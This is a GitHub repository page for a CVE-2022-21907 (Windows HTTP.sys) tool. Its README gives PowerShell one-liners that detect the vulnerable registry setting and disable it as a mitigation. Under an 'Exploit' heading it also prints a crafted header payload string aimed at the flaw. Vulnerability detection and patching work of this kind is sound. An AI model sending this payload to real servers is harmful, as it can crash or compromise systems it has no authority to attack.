Skip to content
/ CVE-2022-21907 Public
forked from mauricelambert/CVE-2022-21907

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired.

License

GPL-3.0 license
0 stars 11 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

toomding/CVE-2022-21907

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
CVE-2022-21907.ps1
CVE-2022-21907.ps1
 
 
CVE202221907.py
CVE202221907.py
 
 
LICENSE.txt
LICENSE.txt
 
 
README.md
README.md
 
 
payload.txt
payload.txt
 
 

Repository files navigation

CVE-2022-21907

Description

This repository detects a system vulnerable to CVE-2022-21907 (CVSS:3.1 9.8), protects against this vulnerability if desired and exploit it with python and powershell (a payload is available). I offer 2 powershell codes in 1 line.

Codes

Only detect

$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}

With protection

Run these scripts as administrator to protect your computer/server.

$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0))
$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}

Exploit

AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,

Sources

Licence

Licensed under the GPL, version 3.

About

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired.

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 52.7%
  • PowerShell 47.3%